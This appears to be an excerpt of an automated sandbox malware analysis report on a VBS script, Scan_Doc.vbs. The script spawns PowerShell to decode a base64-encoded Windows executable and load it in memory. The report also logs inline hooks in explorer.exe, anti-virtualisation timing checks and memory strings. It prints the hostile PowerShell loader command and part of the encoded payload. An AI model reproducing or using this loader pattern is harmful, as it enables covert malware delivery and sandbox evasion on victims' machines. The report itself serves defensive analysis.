          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SystemDrive%\");IWshShell3.ExpandEnvironmentStrings("%SystemRoot%\");IWshShell3.CurrentDirectory();IHost.ScriptName();IFileSystem3.GetParentFolderName("C:\Windows\system32\Scan_Doc.vbs");IHost.ScriptName();IFileSystem3.GetFileName("Scan_Doc.vbs");IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAA", "false")
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJ
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417099 push 35320B40h; retf 3_2_004170A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416B6F push edi; iretd 3_2_00416B7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416C07 pushfd ; retf 3_2_00416C1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4F2 push eax; ret 3_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4FB push eax; ret 3_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D4A5 push eax; ret 3_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041D55C push eax; ret 3_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004166CB pushfd ; ret 3_2_004166CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7D0D1 push ecx; ret 3_2_03A7D0E4
          Source: C:\Windows\explorer.exeCode function: 4_2_07557B1E push esp; retn 0000h4_2_07557B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_07557B02 push esp; retn 0000h4_2_07557B03
          Source: C:\Windows\explorer.exeCode function: 4_2_075579B5 push esp; retn 0000h4_2_07557AE7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045AD0D1 push ecx; ret 7_2_045AD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B7099 push 35320B40h; retf 7_2_001B70A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B6B6F push edi; iretd 7_2_001B6B7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B6C07 pushfd ; retf 7_2_001B6C1A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4A5 push eax; ret 7_2_001BD4F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4FB push eax; ret 7_2_001BD562
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD4F2 push eax; ret 7_2_001BD4F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BD55C push eax; ret 7_2_001BD562
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001B66CB pushfd ; ret 7_2_001B66CC

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000001A9904 second address: 00000000001A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000001A9B6E second address: 00000000001A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-7085
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1848Thread sleep count: 50 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1848Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3249Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 8.2 %
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382422308.0000012C22C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382601236.0000012C24D81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382275127.0000012C22C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
          Source: wscript.exe, 00000000.00000003.382485422.0000012C24C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
          Source: explorer.exe, 00000004.00000003.573784985.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" ?
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" = Kp
          Source: wscript.exe, 00000000.00000003.382882142.0000012C24B44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378800384.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"
